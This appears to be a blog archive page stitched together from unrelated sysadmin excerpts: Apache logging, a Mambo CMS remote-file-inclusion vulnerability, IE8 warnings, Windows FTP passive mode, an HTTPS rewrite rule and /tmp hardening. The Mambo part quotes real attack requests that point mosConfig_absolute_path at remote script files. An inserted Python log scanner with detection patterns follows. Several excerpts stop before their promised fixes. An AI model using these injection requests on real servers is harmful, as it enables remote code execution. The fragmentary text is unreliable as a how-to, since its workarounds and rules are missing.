How To log apache errors to a custom file
December 16th, 2009
Ever needed to fix a problem in your PHP website but could not see the errors or didn’t have access to the error_log of your vhost?
A workaround:

I know that not many people use Mambo these days, and most of them have upgraded to Joomla 1.5, but in case you happen to have one hosted on your server, there is a known vulnerability: hack scripts use the mosConfig_absolute_path variable to load malicious code from other web hosts, and that gives them the ability to run scripts (which you surely don't want) on your server.
An example is requests like the ones below in the Apache access log files:
/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=mosConfig_absolute_path=http://www.rgboy.fi//spreadz.txt??
/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://forum.redglove.it//c.txt??
Securing/hardening the tmp directory is one thing, but it won't do the job; the rules of the latest ModSecurity are not easy at all to write, and you have to be good at regular expressions.
What did the trick in my case was rewrite rules.
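One way to find requests like the ones shown above in an Apache access log, as an added example that is not code from the original post: it flags a request only when its query string both names one of the override parameters and carries a remote URL as a value. The log lines, client addresses and the `attacker.example` host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Client address and request target of an Apache common/combined log line.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Parameter names from the requests above that try to overwrite PHP variables.
OVERRIDE_RE = re.compile(r'(?:mosConfig_absolute_path|GLOBALS|_REQUEST)(?=\[|=)')
# A remote URL used as a parameter value.
REMOTE_RE = re.compile(r'=((?:https?|ftp)://[^&\s]+)', re.I)

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Dec/2009:10:01:02 +0200] "GET /CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example//c.txt?? HTTP/1.1" 200 512',
    '198.51.100.9 - - [16/Dec/2009:10:05:44 +0200] "GET /CMS/index.php?option=com_content&mosConfig_absolute_path=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [16/Dec/2009:10:06:10 +0200] "GET /CMS/index.php?option=com_content&Itemid=1 HTTP/1.1" 200 2048',
    '192.0.2.11 - - [16/Dec/2009:10:07:31 +0200] "GET /out.php?next=http://www.example.com/ HTTP/1.1" 302 0',
]


def scan(lines):
    """Return one finding per log line that sets an override name and passes a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        client, target = m.groups()
        # The log stores the raw request; decode once, as PHP does before the script runs.
        query = unquote(target.split("?", 1)[1])
        names = sorted(set(OVERRIDE_RE.findall(query)))
        remote = REMOTE_RE.search(query)
        # Requiring both conditions keeps ordinary redirect parameters out of the report.
        if names and remote:
            findings.append({"client": client, "names": names, "url": remote.group(1)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], ",".join(f["names"]), f["url"])
```
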
For all of you who upgraded Internet Explorer to the latest 8.x version, I’m sure you have at least once faced the “Security Warning” pop-up with “Do you want to view only the webpage content that was delivered securely?” when you used your Gmail or other accounts.

If you use Windows Server 2003 or 2008 with Windows FTP, you have surely faced the annoying problem where a client tries to connect to his FTP account in Passive Mode and the FTP connection just hangs, so the only way out is to tell the client to use Active Mode (if he can choose that in his FTP client program).
First of all, you have to understand the difference between Active and Passive Mode.
To redirect all http:// traffic to the corresponding https:// traffic, we make use of a bit of mod_rewrite magic.
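# Turn on the rewrite engine
RewriteEngine On
# Apply only to requests that arrived on port 80 (anchored so 8080 does not match)
RewriteCond %{SERVER_PORT} ^80$
# Redirect to the same path on the HTTPS site
RewriteRule ^(.*)$ https://www.example.com/$1 [R,L]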
Replace www.example.com with your own SSL URL.
To force SSL for a particular folder (not the entire site), use the following instead:
After discovering scripts running in my /tmp folder (in CentOS 5.x) I had to harden the directory.
The faster way to harden your /tmp and /var/tmp without rebooting is the following:
In your /dev directory create an empty 2,5 GB file (best for web hosting servers with many websites).
# cd /dev
# dd if=/dev/zero of=tmppart bs=1024 count=2500000
We will now create an ext3 filesystem in our tmppart file.